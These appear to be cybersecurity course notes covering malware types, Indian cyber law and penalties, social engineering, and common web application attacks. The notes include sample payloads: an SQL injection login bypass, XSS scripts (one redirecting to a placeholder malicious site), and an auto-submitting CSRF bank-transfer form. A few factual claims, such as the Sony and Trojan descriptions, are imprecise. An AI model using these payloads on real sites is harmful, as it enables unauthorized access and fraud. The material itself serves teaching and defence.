Cybersecurity is the practice of protecting systems, networks, devices, and data from cyber

threats, such as hacking, data breaches, malware, and other malicious attacks.

It involves a combination of technologies, processes, and measures designed to safeguard

digital assets from unauthorized access, exploitation, or damage.

Cyber crime

A cybercrime is any criminal activity that involves a computer, network, or digital device as
either the target or the means for committing the offense.

Essentially, it refers to crimes that are facilitated or carried out using technology.

These crimes can affect individuals, businesses, governments, or society at large, and they
often involve the unauthorized access, theft, or damage of digital information or systems.

Key Characteristics of Cybercrime:

 Use of Technology: The crime is either committed with or against a computer or

digital system.

 Illegal Actions: It typically involves illegal actions such as theft, fraud, identity theft,
data breaches, or even harassment.

 Impact on Data or Systems: The crime may disrupt, damage, or steal information,
disrupt services, or cause harm to a network or device.

Common Types of Cybercrime:

1. Hacking: Unauthorized access to computer systems to steal data or cause damage.

2. Phishing: Fraudulent attempts to gain sensitive information (e.g., passwords, credit

card details) by posing as a trustworthy entity in electronic communications.

3. Ransomware: Malicious software that locks users out of their data or system and
demands a ransom to restore access.

4. Identity Theft: Stealing someone's personal information to commit fraud or other

crimes in their name.

5. Cyberbullying: Using digital platforms to intimidate, threaten, or harass others.

 6. Malware Distribution: Creating or spreading malicious software like viruses, worms,
or spyware that can harm or compromise data and systems.

7. Online Fraud: Activities like fake online shopping sites, investment scams, or
deceptive services that cheat victims out of money.

8. DDoS Attacks (Distributed Denial of Service): Overloading a website or server with

traffic, causing it to crash and become inaccessible.

9. Child Exploitation: Using the internet to exploit, harm, or abuse children, including
the production or distribution of child pornography.

Examples of Cybercrime:

 A hacker breaching a company's database and stealing customer information.

 A scammer sending fake emails to trick people into giving away credit card details.

 A group using ransomware to lock a hospital's data and demanding payment to

restore access.

What is Malware? And its Types

Malware is malicious software and refers to any software that is designed to cause harm to
computer systems, networks, or users.

Malware is software that gets into the system without user consent to steal the user’s
private and confidential data, including bank details and passwords. They also generate
annoying pop-up ads and change system settings.

Malware includes computer viruses, worms, Trojan horses, ransomware, spyware, and
other malicious programs.

Individuals and organizations need to be aware of the different types of malware and take
steps to protect their systems, such as using antivirus software, keeping software and
systems up-to-date, and being cautious when opening email attachments or downloading
software from the internet.
Why Do Cybercriminals Use Malware?
 Cybercriminals use malware, including all forms of malicious software including
viruses, for various purposes.
 Using deception to induce a victim to provide personal information for identity theft
 Theft of customer credit card information or other financial information
 Taking over several computers and using them to launch denial-of-service attacks
against other networks

Advantages of Detecting and Removing Malware

 Improved Security: By detecting and removing malware, individuals, and organizations
can improve the security of their systems and reduce the risk of future infections.
 Prevent Data Loss: Malware can cause data loss, and by removing it, individuals and
organizations can protect their important files and information.
 Protect Reputation: Malware can cause harm to a company's reputation, and by
detecting and removing it, individuals and organizations can protect their image and
brand.
 Increased Productivity: Malware can slow down systems and make them less efficient,
and by removing it, individuals and organizations can increase the productivity of their
systems and employees.

Disadvantages of Detecting and Removing Malware

 Time-Consuming: The process of detecting and removing malware can be time-
consuming and require specialized tools and expertise.
 Cost: Antivirus software and other tools required to detect and remove malware can be
expensive for individuals and organizations.
 False Positives: Malware detection and removal tools can sometimes result in false
positives, causing unnecessary alarm and inconvenience.
 Difficulty: Malware is constantly evolving, and the process of detecting and removing
it can be challenging and require specialized knowledge and expertise.
 Risk of Data Loss: Some malware removal tools can cause unintended harm, resulting
in data loss or system instability.
Types of Malware
 Worms - Worms replicate themselves on the system, attaching themselves to different
files and looking for pathways between computers, such as computer network that
shares common file storage areas. Worms usually slow down networks. A virus needs a
host program to run but worms can run by themselves. After a worm affects a host, it is
able to spread very quickly over the network.
 Trojan horse - A Trojan horse is malware that carries out malicious operations under
the appearance of a desired operation such as playing an online game. A Trojan horse
varies from a virus because the Trojan binds itself to non-executable files, such as
image files, and audio files.
Adware

Adware is a type of malware (malicious software) that automatically displays or downloads

unwanted advertisements on a user's computer or mobile device, often without the user's
permission. Its main goal is to generate revenue for the developer by showing ads.

 It comes along with software downloads and packages.

 Shows pop-up ads, banner ads, or redirects to advertising websites.

 Often comes bundled with free software.
 May track user behavior (like browsing history) to show targeted ads.
 Can slow down system performance and compromise privacy.

Here are five ways through which adware negatively affects systems:

1. Performance Degradation: High CPU or memory consumed by advertisements when

loading or rendering.
2. Privacy Loss: Gathering browsing history for advertising or potential unauthorized
use.
3. Excessive Consumption of Bandwidth: Frequent data retrieval for ads could result in
increased monthly usage and slow networks.
4. Pop-up Ad Interference: Frequent interruptions in the form of new ad windows
disrupt working efficiency and increase user irritation.
5. Increased Security Risks: Redirects to malicious domains or forced installation of
additional harmful software
How Do You Get Adware?

1. Bundled Apps: Some adwares are hidden in other genuine app installers.
2. Phishing Links: These are emails or ads that contain links to other sites with hidden
adware modules.
3. Trojanized Mobile Apps: Free games or utilities with embedded ad-serving libraries
4. Browser Hijacker: These are extensions or plug-ins that silently modify various
configuration files.
5. Infected USB Drives: These include installing adware executables when inserted into
unprotected computers.

Spyware
 Spyware is a breach of cyber security as it usually gets into the laptop/ computer
system when a user unintentionally clicks on a random unknown link or opens an
unknown attachment, which downloads the spyware alongside the attachment.
Spyware enters the laptop/computer system through the below-listed ways:
 Phishing: It is a form of a security breach where spyware enters the system when a
suspicious link is clicked or an unknown dangerous attachment is downloaded.
 Spoofing: It goes alongside phishing and makes the unauthorized emails appear to
come from legitimate users or business units.
 Free SoftwareSoftware or Shared Software: It gets into the system when a user installs
software that is free of cost but has additional spyware added to it.
 Misleading software: This is advertised as very beneficial for the system and boosts
the speed of the system, but it leads to the theft of confidential information from the
system.
Types of spyware
Here are some common types:
 Keyloggers: These record keystrokes typed in by the user, and they can record
passwords and other sensitive messages.
 Adware: Though not necessarily badware, adware provides advertisements that are not
wanted and tracks your Internet activity to provide relevant advertisements.
 Trojans: These are rogue programs that disguise themselves as genuine applications,
but in reality, they contain spyware that spies on or steals information.
 Tracking Cookies: These are small data files that are created on your browser by the
sites that you visit to keep track of your browsing history and preferences. They can be
useful for advertising purposes since the users of these gateways would prefer only this
kind of content.
 System Monitors: These capture user activity relative to the online mode and use of the
system for other ill intentions.
 Data Harvesters: These are intended for the capture and transfer of messages or data,
which may be in the form of personal identity, log-in data, or even a credit card
number, among others.
 Browser hijackers: These make changes to your browser, like the home page or search
page, and can forward you to sites that contain malware.
 Remote Access Trojans (RATs): These grant the attackers full control of your device
from a distance that they cannot be noticed, and they have access to all files, among
other things.

Computer Virus
 A computer virus is a type of malicious software program ("malware") that,
when executed, replicates itself by modifying other computer
programs and inserting its code.
 When this replication succeeds, the affected areas are then said to be "infected".
 Viruses can spread to other computers and files when the software or documents
they are attached to are transferred from one computer to another using
a network, a disk, file-sharing methods, or through infected email attachments.
 A virus can harm or destroy data, slow down system resources, and log
keystrokes, among other things.
 A virus can have unexpected or harmful outcomes during this procedure, such
as destroying system software by corrupting data.
 Some viruses are made to mess things up by deleting files, messing up
programs, or even wiping out your hard drive completely.
 Even if they're not super harmful, viruses can still slow down your computer a
lot, using up memory and making it crash often.
How to Prevent Your Computer From Viruses?
Install Antivirus Software
 Update Regularly
Be Cautious with Emails and Downloads
Use Strong Passwords
Backup Your Data
Computer Worm
 A computer worm is a type of harmful software that copy itself and spread from
one computer to another without requiring any user intervention.
 It's like a sickness that can move through a network of computers, searching for
weaknesses to infect.
 Worms often spread through email attachments that may seem safe, but they
can actually cause a lot of trouble.
 Once a computer is infected, the worm can send itself to the person's contacts,
using their email account. This way, it keeps spreading to more and more
computers.
How To Prevent Computer Worm Infections ?
1. Keep your software updated and use strong passwords
2. Enable and properly configure firewalls on your computer and network devices.
3. Be cautious with email when dealing with email attachments and links.
4. Practice safe web browsing by avoiding clicking on suspicious advertisements or pop-
up windows.
5. Install and keep updated a reliable antivirus or anti-malware software .
Types of Computer Worms
Email Worms: Email worms spread through email attachments or links
Network Worms: Network worms move through computer networks by exploiting
security weaknesses in network services or protocols
File-Sharing Worms: File Sharing worms target shared folders or peer-to-peer file-
sharing networks.
Instant Messaging (IM) Worms: IM worms spread through instant messaging
platforms. They send infected links or files to a person's contacts. By tricking users
into clicking on these links, they can infect more systems.
Internet Worms: Internet worms target vulnerabilities in websites, web servers, or
web applications. They can infect computers when people visit
compromised websites or interact with infected web content.
Trojan Horse
It is a code that is malicious and has the capacity to take control of the computer. It
is designed to steal, damage, or do some harmful actions on the computer. It tries to
deceive the user to load and execute the files on the device. After it executes, this
allows attackers to perform actions on the user's computer like deleting data from
files, modifying data from files, and more. Now like many viruses or worms, Trojan
Horse does not have the ability to replicate itself.
Features of a Trojan Horse
 Steals Information: Trojan horses are often designed to steal sensitive information
such as passwords, banking details, and other personal data stored on the victim's
computer.
 Remote Access: A Trojan horse can grant remote access to an attacker, allowing them
to control the infected system and perform actions without the user's knowledge or
consent.
 Data Deletion: Some Trojan horses are capable of deleting or corrupting data on the
user's computer, causing data loss or system instability.

Types of Trojan Horse

 Backdoor trojan: gives the attacker remote access to the compromised machine.
 Ransom trojan: encrypt the data on the compromised system and then demand
payment in exchange for its decryption.
 Trojan Banker: steal the account data for online banking, credit and debit cards, etc.
 Cyber Laws

Cyber Law is the area of law that deals with the legal issues related to the use of the internet,
digital communications, and information technology. It is also known as Internet Law or
IT Law.

Cyber law refers to the set of rules and regulations that govern online behavior, the internet,
and digital interactions, including the protection of data, privacy, intellectual property, and
prevention of cybercrimes.

Advantages of Cyber Law

Protection Against Cybercrimes: prescribing penalties for various cybercrimes

Data Privacy: These regulations ensure that organizations handle personal data responsibly,

E-commerce Regulation: It defines rules for online transactions, contracts, and consumer
protection, thereby fostering a fair and secure online marketplace.

Intellectual Property Protection: prevent the unauthorized use and distribution of digital
content,

Cybersecurity Standards: organizations to implement measures for the protection of their

networks and systems.

Information Technology Act, 2000 (IT Act)

 The IT Act, 2000 is the first cyber law in India.

 It was passed to regulate digital transactions, cybercrimes, and e-commerce.
 Enacted on 17 October 2000.
 Information Technology Act, 2000 (IT Act) – The main cyber law in India which:
o Legalizes digital signatures and e-documents.
o Penalizes cybercrimes like hacking, identity theft, and online fraud.
o Establishes legal procedures for electronic evidence.
o
 The Information Technology Act of 2000, also known as IT Act, is the
primary legislation in India that deals with cybercrime and e-commerce.
The act was implemented on October 17, 2000, to provide legal recognition
for electronic documents and facilitate e-governance.
 It consists of various sections and clauses addressing different forms of
cyber offenses such as hacking, data theft, online fraud, virus attacks,
identity theft, and cybersecurity breaches.
 Under the IT Act of 2000, individuals found guilty of unauthorized access
to computer systems can face imprisonment for up to two years or a fine
extending up to one lakh rupees. Moreover, Section 66C provides
punishment for identity theft with imprisonment which may extend to three
years or with a fine not exceeding two lakh rupees or both.
  In addition to these provisions is Section 43A which imposes penalties on
companies failing to protect sensitive personal data from being disclosed
without consent. As per the section's regulations’ non-compliance could
result in significant compensation claims made by those affected by data
leaks due to negligence on part of the company concerned.

 Penalties for different cybercrimes

 In India, penalties for cybercrimes are outlined under various sections of the
Information Technology Act of 2000. The Act specifies fines,
imprisonment, or both, depending on the severity and nature of the
cybercrime committed

Section Provision Description

Penalty for unauthorized If someone accesses a computer or data without permission,
Section 43
access they have to pay compensation.
Punishment for hacking into a system, up to 3 years in jail
Section 66 Hacking
or fine.
Section Using someone else’s password or digital signature –
Identity Theft
66C punishable.
Section
Cheating by Personation Online frauds like phishing or fake emails.
66D
Publishing obscene
Section 67 Punishment for sending or posting vulgar content online.
material
If any person leaks sensitive data from a computer without
Section 72 Breach of confidentiality
consent.
Cyber security and Punishment
Key Provisions and Punishments Under the IT Act
The IT Act outlines various offenses and their respective penalties:

1. Unauthorized Access (Section 43)

o Offense: Unauthorized access to a computer, computer system, or
network.
o Punishment: Compensation to the affected party, which can go up
to ₹1 crore.
2. Hacking (Section 66)
o Offense: Dishonestly or fraudulently accessing a computer
resource.
o Punishment: Imprisonment up to three years and/or a fine up to ₹5
lakh.
3. Identity Theft (Section 66C)
o Offense: Using someone else’s password or digital signature
without authorization.
 o Punishment: Imprisonment up to three years and/or a fine up to ₹1
lakh.
4. Cheating by Personation Using Computer Resource (Section 66D)
o Offense: Cheating by pretending to be someone else using a
computer resource.
o Punishment: Imprisonment up to three years and/or a fine up to ₹1
lakh.
5. Cyber Terrorism (Section 66F)
o Offense: Acts that threaten the integrity, sovereignty, or security of
India using cyber means.
o Punishment: Imprisonment for life.
6. Publishing Obscene Material (Section 67)
o Offense: Publishing or transmitting obscene material in electronic
form.
o Punishment: First-time offenders face imprisonment up to three
years and a fine up to ₹5 lakh; subsequent convictions lead to
imprisonment up to five years and a fine up to ₹10 lakh.
7. Child Pornography (Section 67B)
o Offense: Publishing or transmitting child pornography in electronic
form.
o Punishment: First-time offenders face imprisonment up to five
years and a fine up to ₹10 lakh; subsequent convictions lead to
imprisonment up to seven years and a fine up to ₹10 lakh.
8. Breach of Confidentiality and Privacy (Section 72)
o Offense: Unauthorized disclosure of information without consent.
o Punishment: Imprisonment up to two years and/or a fine up to ₹1
lakh.

Relevant Indian Penal Code Sections

Certain cybercrimes are also punishable under the IPC:

1. Forgery (Section 463)

o Offense: Creation of fake documents or electronic records.
o Punishment: Imprisonment up to two years, or a fine, or both.
2. Criminal Intimidation (Section 506)
o Offense: Threatening someone with injury to person, reputation, or
property.
o Punishment: Imprisonment up to two years, or with fine, or both. If
the threat is to cause death or grievous hurt, the punishment can
extend to seven years.
3. Defamation (Section 499)
o Offense: Making false statements that harm someone’s reputation.
o Punishment: Imprisonment up to two years, or with fine, or both.
Regulations and Laws:
Information Technology Act, 2000 (IT Act)
 Purpose: First law to provide legal recognition for e-commerce and cybercrime.
 Key Areas:
o Legal recognition of electronic records and digital signatures.
o Penalties for cybercrimes (e.g., hacking, phishing, data theft).
o Defines cyber offences and prescribes punishment.
o Establishes CERT-In (Indian Computer Emergency Response Team) under
Section 70B for incident response.

🔹 2. IT (Amendment) Act, 2008

 Why amended: To handle growing cyber threats and add data protection elements.
 Major Additions:
o Introduced terms like cyber terrorism, identity theft, and phishing.
o Strengthened legal enforcement mechanisms.
o Empowered the government to block websites and monitor communications.

🔹 3. Digital Personal Data Protection (DPDP) Act, 2023

 Focus: Protect digital personal data and regulate its processing.
 Key Concepts:
o Data Principal: The individual whose data is collected.
o Data Fiduciary: Entity that processes the data.
 Rights of Individuals:
o Right to consent, access, correction, and erasure of personal data.
o Right to grievance redressal.
 Enforcement: Through the Data Protection Board of India.

🔹 4. National Cyber Security Policy, 2013

 Vision: Create a secure cyber ecosystem in the country.
 Objectives:
o Protect critical information infrastructure (CII).
o Develop cyber security skills.
o Encourage public-private partnerships.
o Promote awareness and research in cyber technologies.

🔹 5. National Cyber Security Strategy, 2020

Prepared by: National Security Council Secretariat
(NSCS).
 Goals:
o Strengthen cyber governance.
 o Protect digital infrastructure and build response capabilities.
o Promote indigenous cyber products.
 Status: Awaiting official release/implementation.

🔹 6. IT (Intermediary Guidelines and Digital Media Ethics

Code) Rules, 2021
 Applicability:
o Social media platforms (e.g., WhatsApp, Twitter).
o OTT platforms (e.g., Netflix, Amazon Prime).
o Digital news media.
 Key Requirements:
o Appointment of grievance officer and compliance officer.
o Monthly compliance reports.
o Traceability of message originators.
o Classification and regulation of OTT content.

🔹 7. National Cyber Security Reference Framework

(NCRF) 2023
 Purpose: To help government and private organizations strengthen cyber defenses.
 Features:
o Provides guidelines for designing secure IT systems.
o Includes reference architectures, compliance models, and best practices.
o Promotes risk assessment and response planning.

🔹 8. CERT-In (Indian Computer Emergency Response

Team)
 Established: Under Section 70B of IT Act.
 Role:
o Acts as the nodal agency for cyber incident response.
o Issues advisories, guidelines, vulnerability notes.
o Mandates reporting of breaches within 6 hours (as of 2022).
o Conducts audits and awareness programs.

🔹 9. NCSC (National Cyber Security Centre)

 Objective: Strengthen coordination on cyber threats at the national level.
 Functions:
o Coordinate among ministries, CERT-In, law enforcement, and private players.
o Develop response mechanisms for national-level cyber attacks.

🔹 10. SEBI (Securities and Exchange Board of India)

 Responsibility: Regulates the securities market.
  Cybersecurity Role:
o Mandates regular cyber audits for stock exchanges, brokers, and depositories.
o Enforces guidelines on data protection, incident response, and risk mitigation.

🔹 11. IRDAI (Insurance Regulatory and Development

Authority of India)
 Responsibility: Regulates the insurance sector.
 Cybersecurity Measures:
o Issued guidelines for insurers to implement cyber security frameworks.
o Promotes cyber insurance policies.
o Mandates reporting of cyber incidents.

🔹 12. Cybercrime Reporting Platform (I4C/NCRP)

 Operated by: Indian Cyber Crime Coordination Centre (I4C).
 Platform: https://cybercrime.gov.in
 Purpose:
o Allows public to report cybercrimes like financial frauds, social media abuse,
cyberbullying, etc.
o Separate portal for law enforcement to investigate cases.
o Supports both anonymous and official reporting.

Regulation/Body Focus Area

IT Act, 2000 Legal framework for electronic transactions & cybercrime

IT Amendment, 2008 Expanded coverage for new-age cyber threats

DPDP Act, 2023 Protecting digital personal data

NCSP 2013 National cyber security policy framework

Cyber Strategy 2020 Future vision for cyber defense

Intermediary Rules 2021 Governs digital content, social media & OTT

NCRF 2023 Standard cyber framework for orgs.

CERT-In Incident handling & awareness

NCSC National-level coordination

SEBI & IRDAI Sector-specific cyber compliance

I4C Public platform to report cybercrimes

 Unit II : Methods of Malware Attacks

In the section above, we identified the various types of malware along with the method by
which they spread. The ways that malware can infiltrate and spread through networks
continues to expand along with the threat vectors in the digital landscape, including the
following:

 Unsecure devices that access the network such as personal mobile devices, PCs, and
IoT devices open an attack vector for malware.
 Unsecure networks that are part of a supply chain or unsecure third-party partners’
networks, can infect the networks of other suppliers or give malware access to the
enterprise network.
 Older devices on the network with software that is not routinely updated can become
compromised and spread malware.
 Email attachments containing malicious code can be opened and forwarded to other
users, spreading the malware across the enterprise.
 Phishing or spear phishing emails trick the recipient into sharing passwords that give
access to the corporate network where malware can spread.
 Smishing texts, similar to phishing emails but on mobile phones, trick distracted users into
clicking on malware links and entering personal or business credentials that enable
malware to spread on the network.
 File servers, such as those based on the common internet file system or network file
system can spread malware as users download infected files.
 File-sharing software can allow malware to replicate itself onto removable media such as
thumb drives and then on to computer systems and networks.
 Peer to peer (P2P) file sharing can introduce malware by sharing infected files as
seemingly harmless as video, music, or images,
 Remotely exploitable network vulnerabilities can enable a hacker to access systems
regardless of geographic location
 Social Engineering attacks

Social engineering refers to a wide range of attacks that leverage human interaction and
emotions to manipulate the target. During the attack, the victim is fooled into giving away
sensitive information or compromising security.

A social engineering attack typically takes multiple steps. The attacker will research the
potential victim, gathering information about them and how they can use them to bypass
security protocols or get information. Then the attacker does something to gain the target’s
trust before finally manipulating them into divulging sensitive information or violating
security policies.
Traits of a Social Engineering Attack
 Heightened emotions: An attacker threatens the loss of an account to trick
users into providing their credentials, or the attacker might pretend to be an
executive demanding money from a targeted user to instill a sense of urgency in
an employee fearful of losing their job.
 Spoofed sender address: Most users are unaware that a sender email
address can be spoofed, but proper email security will stop spoofed senders
from accessing a targeted user’s inbox. Instead, an attacker will register a
domain similar to an official one and hope that a targeted user does not notice
the misspelling.
 Strange friend requests: It’s not uncommon for an attacker to compromise an
email account and spam malicious messages to the victim’s contact list.
Messages are usually short and don’t have the personalized element from
friends, so be hesitant to click links from friends if the message does not sound
like personalized communication.
 Unprofessional website links: Phishing links are sometimes used with social
engineering to trick users into divulging sensitive information. Never enter
credentials into a website directly from an email link, even if it looks like an official
site (e.g., PayPal).
 Too good to be true: Scammers often promise money in exchange for
monetary compensation. For example, a targeted user could get a free iPhone in
exchange for shipping payments. If the offer is too good to be true, then it is
probably a scam.
 Suspicious attachments: Instead of tricking targeted users into divulging
private information, a sophisticated attack might work towards installing malware
on a corporate machine using email attachments. Never run macros or
executables on a machine from a seemingly harmless email message.
 Questionable sender: Many social engineering techniques are designed to
mimic a familiar source, such as a friend, boss, or co-worker. In the event you
receive a suspicious email message, always check in and ask yourself “did my
 boss/friend/co-worker actually send this to me?” Before responding to the email
in question, contact the actual person via phone call, text, or social media
message to validate whether or not their being impersonated.
 Refusal to respond to questions: If a message seems suspicious, reply to the
message and ask the sender to identify themselves. An attacker will avoid
identifying themselves and might just ignore the request.
 Unidentifiable sender: If the sender is unable or unwilling to verify their identity
with the organization, do not provide any additional information or access that
they're requesting. While email messages are the most common, this applies to
other social engineering tactics as well, such as text messages, phone calls, etc.

The overall technique used in social engineering is using emotions to trick

users, but attackers use several standard methods to push the user into
performing an action (e.g., sending money to a bank account) and making the
attack look more legitimate. Usually, the techniques involve email or text
messages, because they can be used without voice conversations.

A few common examples of social engineering techniques include:

 Phishing: With social engineering, an attacker usually pretends to be a
corporate executive to trick users into sending money to an offshore bank
account.
 Vishing and smishing: Attackers use text messages and voice-changing
software to send SMS messages or robo-call users. The messages usually
promise gifts or services in exchange for payment. These types of scams are
called vishing (voice phishing) and smishing (SMS phishing).
 CEO (executive) fraud: Users often feel urgency when an executive requests
action, so an attacker will pretend to be the CEO or another executive to instill a
sense of urgency for the targeted employee to perform an action. This is known
as CEO fraud.
 Baiting: It’s common for attackers to promise prizes or money in exchange for a
small payment. The offer is usually too good to be true, and the payment is
usually for shipping or some other cost coverage.
 Pretexting: Attackers may create a false pretext to gain sensitive information or
access to a system. For example, an attacker might impersonate a bank teller
and contact a target individual to claim that there’s been suspicious activity on
their account and ask them to share sensitive information to confirm their
account.
 Tailgating or piggybacking: Corporations that use security scanners to block
unauthorized access to the premises. An attacker uses tailgating or
 piggybacking to trick users into using their own access cards to give the attacker
physical access to the premises.
 Quid pro quo: Disgruntled employees could be tricked into providing sensitive
information to an attacker in exchange for money or other promises.
 Watering hole: This form of social engineering attack involves targeting certain
groups by infecting websites that the group is likely to visit. For example, an
attacker might infect a popular news site with malware with the intention that
employees of a certain company will visit the site and inadvertently download the
malware.
 Responding to a question never asked: The targeted victim will receive an
email “responding” to a question, but the response will ask for personal details,
contain a link to a malicious website, or include a malware attachment.
 Threaten loss of money or accounts, or threaten prosecution: Fear is a
useful tool in social engineering, so an effective way to trick users is to tell them
that they will suffer money loss or go to jail if they do not comply with the
attacker’s request.
Term Description
Phishing Fake emails/websites to steal info
Vishing Voice call scams
Smishing SMS-based phishing
Pretexting Fake identities to get data
Baiting Using physical devices with malware
Tailgating Unauthorized entry to secure areas
Quid Pro Quo Trade offer for sensitive information


How to Prevent Social Engineering Attacks

 Think before you click — Don’t open suspicious emails or links.

 Verify identities — Confirm before sharing any sensitive info.
 Use strong passwords and enable multi-factor authentication.
 Educate and train users regularly.
 Update software to avoid exploits.
 Report suspicious activities immediately.

Web application attack

Web Application:

A web application is a software program that runs on a web server and is accessed through a
browser. Examples include:

 Online banking platforms

  E-commerce websites (like Amazon, Flipkart)
 Social media sites (like Facebook, Instagram)
 Online forms, login portals, feedback systems, etc.

Web application attacks are a major threat in today's digital world. Securing web applications
through best practices and continuous monitoring is essential to protect data and maintain trust.

A web application attack is any exploit that takes advantage of weaknesses in a website or
web-based software to compromise its security.

Web application attacks in cyber security are malicious attempts to exploit vulnerabilities in
web applications to gain unauthorized access, disrupt operations, or steal sensitive data.

These attacks target weaknesses in the application's code, infrastructure, or user

interactions. Common examples include SQL injection, cross-site scripting (XSS), and cross-
site request forgery (CSRF).

SQL Injection (SQLi)

SQL Injection occurs when an attacker inputs malicious SQL statements into an input
field (like login or search boxes) to manipulate the application’s database.

Instead of the input being treated as plain text, it gets executed as SQL code. This can
expose or even modify the entire database.

Example Scenario:
A login form asks for a username and password.
The attacker enters:

Username: ' OR '1'='1

Password: anything
The condition '1'='1' always evaluates to true, so the attacker bypasses authentication and
logs in as an admin.

 Consequences:
o Unauthorized access to user data
o Data loss or corruption
o Full control over the database

Cross-Site Scripting (XSS)

 What It Is:
XSS occurs when attackers inject malicious JavaScript or code into a trusted web page.
When another user loads the page, the code executes in their browser.
 What Happens:
The script runs as if it came from the site itself, often stealing session cookies or
redirecting users.
 Example:
<script>document.location='http://malicious-site.com'</script>
  Consequences:
o Stolen login sessions
o Defaced websites
o Misleading users into revealing data

Example Scenario:
A website allows users to comment on blog posts but does not sanitize input.
Attacker posts:
 <script> alert('Your session is stolen'); </script>
  What Happens:
Anyone viewing that post triggers the alert. In real attacks, this script could steal cookies
or redirect users to malicious websites.

Cross-Site Request Forgery (CSRF)

 What It Is:
CSRF tricks a user into submitting a malicious request unknowingly while logged into a
trusted site.
 What Happens:
A user might click a hidden link in an email or webpage that executes an action like
transferring money or changing a password.
 Example Scenario:
A user is logged into their online banking. While visiting a malicious website, an
invisible form is auto-submitted:

html
CopyEdit
<form action="https://bank.com/transfer" method="POST">
<input type="hidden" name="amount" value="1000">
<input type="hidden" name="to" value="attacker_account">
</form>
<script> document.forms[0].submit(); </script>

 The bank thinks the request came from the user and processes the transfer.

 Consequences:
o Unauthorized transactions
o User data or settings changed without consent

Security Misconfigurations

 What It Is:
These occur when developers or system administrators leave systems in an insecure
state.
 Common Misconfigurations:
o Default passwords left unchanged
o Error messages revealing sensitive information
o Unused features or services left enabled
  Example Scenario:
A developer leaves the admin dashboard exposed at https://example.com/admin
using default credentials:
 makefile
 CopyEdit
 Username: admin
 Password: admin123

An attacker guesses the URL and logs in easily using default credentials, gaining full control
over the site.

 Consequences:
o Easy entry points for attackers
o Data leaks through misconfigured servers

Sensitive Data Exposure

 What It Is:
Failure to properly protect sensitive information such as passwords, credit card numbers,
or personal data.
 Examples of Poor Practices:
o Storing passwords in plain text
o Using outdated encryption methods
o No HTTPS encryption
 Consequences:
o Identity theft
o Financial fraud
o Legal and reputational consequences
  Example Scenario:
A website uses HTTP instead of HTTPS during login. A user connects over public Wi-
Fi.
  What Happens:
A hacker on the same network uses a packet sniffer to capture the unencrypted username
and password.

Insecure Deserialization

 What It Is:
Deserialization is the process of converting data into an object in programming. If this
process is not secure, attackers can inject harmful objects or code.
 What Happens:
The application might unknowingly execute malicious code or grant access to restricted
areas.
 Consequences:
o Remote Code Execution
o Escalation of privileges
o Application crashes

Example Scenario:
A web app stores user settings in a serialized object and sends it to the browser as a
cookie:
  user_data = {"role":"user", "name":"John"}
 The attacker modifies it:
 user_data = {"role":"admin", "name":"John"}
  What Happens:
When deserialized on the server without validation, the attacker gains admin privileges.

Broken Access Control

 What It Is:
Access control ensures users can only access resources they're authorized to. Broken
access control means users can access things they shouldn’t.
 Examples:
o A user accessing admin pages without permission
o Modifying the URL to access other users’ data
 Consequences:
o Data leaks
o Unauthorized actions like deleting records
  Example Scenario:
A normal user visits:
 https://example.com/account/view?user=1002
 Then changes the URL to:
 https://example.com/account/view?user=1001
  What Happens:
If the application doesn’t check authorization properly, the user can see another person’s
account details.

Third-Party Code Abuse

 What It Is:
Web apps often rely on third-party libraries and plugins. If these are outdated or
insecure, attackers can exploit them.
 Example:
An old plugin with a known vulnerability can be used to inject malware.
 Consequences:
o Supply chain attacks
o Site defacement
o Data exfiltration
  Example Scenario:
A site uses an outdated version of a JavaScript plugin that has a known vulnerability.
  What Happens:
An attacker uses this vulnerability to run malicious code or hijack the page.
Example: Exploiting a vulnerable version of jQuery or WordPress plugin.


API Attacks

 What It Is:
APIs (Application Programming Interfaces) allow systems to communicate. If APIs are
insecure, attackers can manipulate them to access data or take control.
 Example:
Changing an API call’s user ID to access someone else’s profile or data.
 Consequences:
o Unauthorized data access
o Service disruption
o Misuse of business logic

Real-World Case Studies

Attack Type Real Example Impact

Hackers stole massive amounts of employee data and leaked it

SQL Injection Sony Pictures (2011)
online.

Millions of user profiles were infected through self-replicating

XSS MySpace Worm (2005)
XSS code.

Attackers posted malicious comments that tricked users into

CSRF YouTube exploit (2008)
rating videos.

Data
Equifax Breach (2017) 147 million users' data stolen due to poor security practices.
Exposure

Facebook Graph API A bug allowed attackers to harvest personal data of millions of
API Abuse
(2018) users.